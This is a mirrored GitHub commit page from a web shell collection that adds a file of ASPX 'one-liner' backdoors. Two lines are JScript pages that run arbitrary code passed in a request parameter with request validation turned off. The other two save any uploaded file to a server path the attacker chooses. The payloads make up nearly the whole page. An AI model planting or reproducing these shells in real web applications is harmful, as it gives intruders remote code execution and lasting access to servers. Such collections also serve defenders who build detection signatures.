1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

add the word webshell

This commit is contained in:
tennc
2014-05-22 08:41:53 +08:00
parent e60084c9e0
commit cf5003d2a2
4 changed files with 41 additions and 0 deletions

7
aspx/ASPX一句话02.txt Normal file
View File

@@ -0,0 +1,7 @@
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
< %@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>